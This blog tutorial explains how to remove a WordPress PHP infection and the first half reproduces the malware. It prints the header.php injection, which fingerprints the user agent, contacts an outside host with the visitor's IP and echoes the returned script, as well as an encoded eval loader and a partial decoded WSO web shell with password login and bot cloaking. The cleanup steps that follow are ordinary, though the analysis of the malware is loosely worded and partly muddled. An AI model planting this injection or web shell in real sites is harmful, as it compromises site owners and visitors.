Remove WordPress PHP Virus

This tutorial presents a particular case where a blog WordPress it was infected. Removal WordPress PHP Virus.

The other day I noticed a suspicious code that seems to be a PHP virus for WordPress. The following PHP code was present in the header.php, before the line </head>.

<?php $wp_rssh = 'http'; $wp_gt = 'web'; error_reporting(0); ini_set('display_errors',0); $wp_uagent = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Firefox|MSIE/i', $wp_uagent) && preg_match ('/ NT/i', $wp_uagent))){
$wp_gturl=$wp_rssh."://".$wp_gt.$wp_rssh."s.com/".$wp_gt."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_uagent);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_gturl);
curl_setopt ($ch, CURLOPT_TIMEOUT, 10); $wp_cntnt = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_cntnt,1,3) === 'scr' ){ echo $wp_cntnt; } ?>

This is some PHP code that looks like it's trying to retrieve the content of a resource from an external server, but the part that refers to the URL is incomplete.

The working mechanism is somewhat more complex and does this WordPress PHP Virus invisible to visitors of affected sites. Instead, it targets search engines (Google) and implicitly leads to a significant decrease in the number of visitors to the affected websites.

Details of the malware WordPress PHP Virus

1. The above code is present in header.php.

2. A file appeared on the server wp-log.php in the folder wp-includes.

3. wp-log.php contains an encrypted code, but which is relatively easy to decrypt.

<?php eval(gzinflate(base64_decode('7b1rd../Fw=='))) ?>

Decrypt malware code from wp-log.php :

<?php
$auth_pass = "md5password";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
#+Dump Columns ////Boolean
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler" );
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}

@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.5');

if(get_magic_quotes_gpc()) {
    function WSOstripslashes($array) {
        return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
    }
    $_POST = WSOstripslashes($_POST);
    $_COOKIE = WSOstripslashes($_COOKIE);
}

function wsoLogin() {
    die("
<pre align=center-->

<form method="post"><input name="pass" type="password" /><input type="submit" value="" /></form>" );
}

function WSOsetcookie($k, $v) {
$_COOKIE[$k] = $v;
setcookie($k, $v);
}

if(!empty($auth_pass)) {
if(isset($_POST['pass']) &amp;&amp; (md5($_POST['pass']) == $auth_pass))
WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);

if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
wsoLogin();
}

if(strtolower(substr(PHP_OS,0,3)) == "win" )
$os = 'win';
else
$os = 'nix';

$safe_mode = @ini_get('safe_mode');
if(!$safe_mode)
error_reporting(0);

$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if(isset($_POST['c']))
@chdir($_POST['c']);
$cwd = @getcwd();
if($os == 'win') {
$home_cwd = str_replace("\\", "/", $home_cwd);
$cwd = str_replace("\\", "/", $cwd);
}
if($cwd[strlen($cwd)-1] != '/')
$cwd .= '/';
?>

This appears to be a malicious PHP script that contains code to handle authentication and actions on files and directories on a server. It can be seen very easily that this script contains variables like $auth_pass (authentication password), $default_action (the default action), $default_use_ajax (using Ajax by default) and $default_charset (default character setting).

Obviously, this script has a section that checks HTTP user agents to block access to certain web bots, such as search engines. It also has a section that checks PHP security mode and sets certain working directories.

4. If wp-log.php is accessed in the browser, a web page appears with a field of authentication. At first glance it appears to be a file manager through which new files can be easily uploaded to the target server.

How do you devirus a website WordPress?

Always, the manual de-virus process involves first discovering and understanding what the vulnerability was.

1. Generate a backup for the entire website. This must include both the files and the database.

2. Determine approximately how long the virus has been around and search the web server for modified or newly created files within the approximate time frame.

For example, if you want to see the files .php created or modified in the last week, run the command in the server:

find /your/web/path -type f -mtime -7 -exec ls -l {} \; | grep "\.php$"

It is a simple method by which you can uncover the files WordPress infected and those containing malware code.

3. Check the file .htaccess of suspicious directives. Permission lines or script execution.

4. Check the database. It is quite possible that some posts and pages WordPress be edited with malware or new ones added users with role of administrator.

5. Check the write permissions for folders and files. chmod and chown.

Recommended permissions are: 644 for files and 755 for directories.

find /web/root/public/ -type f -exec chmod 644 {} \;
find /web/root/public/ -type d -exec chmod 755 {} \;

6. Update all WordPress Plugins / WordPress Themes.

Related: Fix Redirect WordPress Hack 2023 (Redirect Virus)

These are "basic" methods by which you can devirus a website / blog WordPress. If you have problems and need help, the comment section is open.

Passionate about technology, I enjoy writing on StealthSettings.com since 2006. I have a rich experience in operating systems: macOS, Windows, and Linux, as well as in programming languages and blogging platforms (WordPress) and for online stores (WooCommerce, Magento, PrestaShop).

How to » WordPress » Remove WordPress PHP Virus
Leave a Comment